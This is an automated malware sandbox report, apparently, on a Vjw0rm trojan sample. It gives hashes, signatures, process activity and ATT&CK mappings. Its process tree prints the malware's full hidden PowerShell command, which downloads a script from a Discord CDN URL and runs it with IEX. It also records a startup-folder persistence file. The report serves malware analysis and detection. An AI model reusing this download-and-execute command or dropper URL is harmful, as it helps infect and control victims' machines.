vjw0rm | a3bda5240c364f1afd8a70384330092c99eb8d1c0133cf0c2e4e0dfaf927d6d8

General

Target

Requerimiento.exe
Size

166KB
MD5

4c8b8d244f471478ad5c6bb4babb279e
SHA1

d7a22176243764fa8e499405597d612eb36cfbbd
SHA256

a3bda5240c364f1afd8a70384330092c99eb8d1c0133cf0c2e4e0dfaf927d6d8
SHA512

608e69ea5e59b4a00359ec3dc5b65da689ff1908e6ee0ad5a8824fd774fcfb39abaedfe3c84142734a3d12019844196e0e5b4fe1f00e76c251662f4677b148ff

Score

10^/10

vjw0rm suricata trojan worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://cdn.discordapp.com/attachments/869602547248283711/877244888020840448/Main.png

Signatures

Vjw0rm
Vjw0rm is a remote access trojan written in JavaScript.
trojan worm vjw0rm
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata

Blocklisted process makes network request 18 IoCs

Processes:

WScript.exepowershell.exe

flow	pid	process
14	2272	WScript.exe
16	3156	powershell.exe
20	2272	WScript.exe
21	2272	WScript.exe
22	2272	WScript.exe
23	2272	WScript.exe
24	2272	WScript.exe
25	2272	WScript.exe
26	2272	WScript.exe
27	2272	WScript.exe
28	2272	WScript.exe
29	2272	WScript.exe
30	2272	WScript.exe
31	2272	WScript.exe
32	2272	WScript.exe
33	2272	WScript.exe
34	2272	WScript.exe
35	2272	WScript.exe

Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

2.exe

pid process

500 2.exe

pid	process
500	2.exe

Drops startup file 2 IoCs

Processes:

WScript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4.js	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4.js	WScript.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

Requerimiento.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings Requerimiento.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exe2.exe

pid process

3156 powershell.exe
3156 powershell.exe
3156 powershell.exe
500 2.exe
500 2.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exe2.exe

description pid process

Token: SeDebugPrivilege 3156 powershell.exe
Token: SeDebugPrivilege 500 2.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	Requerimiento.exe

pid	process
3156	powershell.exe
3156	powershell.exe
3156	powershell.exe
500	2.exe
500	2.exe

description	pid	process
Token: SeDebugPrivilege	3156	powershell.exe
Token: SeDebugPrivilege	500	2.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

Requerimiento.exeWScript.execmd.exe2.exe

description	pid	process	target process
PID 656 wrote to memory of 500	656	Requerimiento.exe	2.exe
PID 656 wrote to memory of 500	656	Requerimiento.exe	2.exe
PID 656 wrote to memory of 500	656	Requerimiento.exe	2.exe
PID 656 wrote to memory of 196	656	Requerimiento.exe	WScript.exe
PID 656 wrote to memory of 196	656	Requerimiento.exe	WScript.exe
PID 656 wrote to memory of 196	656	Requerimiento.exe	WScript.exe
PID 196 wrote to memory of 1868	196	WScript.exe	cmd.exe
PID 196 wrote to memory of 1868	196	WScript.exe	cmd.exe
PID 196 wrote to memory of 1868	196	WScript.exe	cmd.exe
PID 1868 wrote to memory of 3156	1868	cmd.exe	powershell.exe
PID 1868 wrote to memory of 3156	1868	cmd.exe	powershell.exe
PID 1868 wrote to memory of 3156	1868	cmd.exe	powershell.exe
PID 656 wrote to memory of 2272	656	Requerimiento.exe	WScript.exe
PID 656 wrote to memory of 2272	656	Requerimiento.exe	WScript.exe
PID 656 wrote to memory of 2272	656	Requerimiento.exe	WScript.exe
PID 500 wrote to memory of 3040	500	2.exe	vbc.exe
PID 500 wrote to memory of 3040	500	2.exe	vbc.exe
PID 500 wrote to memory of 3040	500	2.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\Requerimiento.exe
"C:\Users\Admin\AppData\Local\Temp\Requerimiento.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:656

C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:500

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
PID:3040

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3.vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:196

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://cdn.discordapp.com/attachments/869602547248283711/877244888020840448/Main.png');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack
3⤵
- Suspicious use of WriteProcessMemory
PID:1868

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://cdn.discordapp.com/attachments/869602547248283711/877244888020840448/Main.png');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3156

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4.js"
2⤵
- Blocklisted process makes network request
- Drops startup file
PID:2272

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

1

T1064

Persistence

Privilege Escalation

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2.exe
MD5
12be709e545bd7cc299ac774db10df56

SHA1
da60713fa2252e9ae121fbddb4b6233c63631652

SHA256
4d4c674dff6b475809611b56a32988a72419d7e3342d2ccd6370ab4a887a2c9b

SHA512
a55fee706e0634024e5adbd99e369e1ad6e2299faa69d3fa50056384ae70bfa107c051dfe14e64dd4281b7ae0df565d0ec2239398fad93ea0b6753f482b7eb43

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.exe
MD5
12be709e545bd7cc299ac774db10df56

SHA1
da60713fa2252e9ae121fbddb4b6233c63631652

SHA256
4d4c674dff6b475809611b56a32988a72419d7e3342d2ccd6370ab4a887a2c9b

SHA512
a55fee706e0634024e5adbd99e369e1ad6e2299faa69d3fa50056384ae70bfa107c051dfe14e64dd4281b7ae0df565d0ec2239398fad93ea0b6753f482b7eb43

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.vbs
MD5
35054bdb043705bb9c1c8a594f69d6fb

SHA1
bce72d39604c130f8dcef8b3acf13fe8291ca476

SHA256
430328793e41c6843633bb0877aa02d7343a6f1d8fb903d4cac514031308979b

SHA512
213b0a51071fdb7e2771465095f5f7ea89eb690e37e05e4aa877314e3b3766beb26e8ef78b4ef4cd3a78f4cd6002697ff4b84740b81214cbea1c4361ef9615e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\4.js
MD5
3ed2dd265f168e2b71606ee0dfc67b43

SHA1
1ea61c18fdf136a36e600194abecf11e173c745d

SHA256
139b6fa0515cc409d3004b231b29711174c7661cc21805544ffe84c596c0feb7

SHA512
79eac0543a25539489b2c1cc20636e1f8660b4d405ebb0cab743b42de982360b191b83b40fe5a24ff4a4d3cc21872be6f45f00d4d3a88265dc199b54080a0eb8

Download Submit
memory/196-117-0x0000000000000000-mapping.dmp

Download
memory/500-120-0x00000000000F0000-0x00000000000F1000-memory.dmp

Filesize
4KB

Download
memory/500-171-0x0000000005420000-0x000000000591E000-memory.dmp

Filesize
5.0MB

Download
memory/500-114-0x0000000000000000-mapping.dmp

Download
memory/500-133-0x0000000004B70000-0x0000000004B71000-memory.dmp

Filesize
4KB

Download
memory/500-170-0x00000000055A0000-0x00000000055A1000-memory.dmp

Filesize
4KB

Download
memory/500-169-0x0000000005920000-0x0000000005921000-memory.dmp

Filesize
4KB

Download
memory/500-168-0x00000000053C0000-0x000000000541F000-memory.dmp

Filesize
380KB

Download
memory/1868-119-0x0000000000000000-mapping.dmp

Download
memory/2272-125-0x0000000000000000-mapping.dmp

Download
memory/3156-157-0x00000000095E0000-0x00000000095E1000-memory.dmp

Filesize
4KB

Download
memory/3156-122-0x0000000000000000-mapping.dmp

Download
memory/3156-131-0x0000000007DD0000-0x0000000007DD1000-memory.dmp

Filesize
4KB

Download
memory/3156-134-0x0000000007E70000-0x0000000007E71000-memory.dmp

Filesize
4KB

Download
memory/3156-135-0x00000000080C0000-0x00000000080C1000-memory.dmp

Filesize
4KB

Download
memory/3156-138-0x0000000008510000-0x0000000008511000-memory.dmp

Filesize
4KB

Download
memory/3156-139-0x0000000008800000-0x0000000008801000-memory.dmp

Filesize
4KB

Download
memory/3156-148-0x0000000008AC0000-0x0000000008AC1000-memory.dmp

Filesize
4KB

Download
memory/3156-130-0x0000000004DC2000-0x0000000004DC3000-memory.dmp

Filesize
4KB

Download
memory/3156-132-0x0000000008050000-0x0000000008051000-memory.dmp

Filesize
4KB

Download
memory/3156-164-0x0000000004DC3000-0x0000000004DC4000-memory.dmp

Filesize
4KB

Download
memory/3156-163-0x0000000009710000-0x0000000009711000-memory.dmp

Filesize
4KB

Download
memory/3156-165-0x0000000009A70000-0x0000000009A72000-memory.dmp

Filesize
8KB

Download
memory/3156-166-0x0000000009A80000-0x0000000009A82000-memory.dmp

Filesize
8KB

Download
memory/3156-167-0x0000000009AB0000-0x0000000009AC2000-memory.dmp

Filesize
72KB

Download
memory/3156-129-0x0000000004DC0000-0x0000000004DC1000-memory.dmp

Filesize
4KB

Download
memory/3156-128-0x0000000007770000-0x0000000007771000-memory.dmp

Filesize
4KB

Download
memory/3156-127-0x0000000004D20000-0x0000000004D21000-memory.dmp

Filesize
4KB

Download
memory/3156-162-0x0000000009FE0000-0x0000000009FE1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads